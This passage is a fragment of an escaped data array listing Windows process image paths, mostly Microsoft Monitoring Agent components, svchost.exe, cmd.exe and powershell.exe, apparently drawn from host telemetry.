state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\"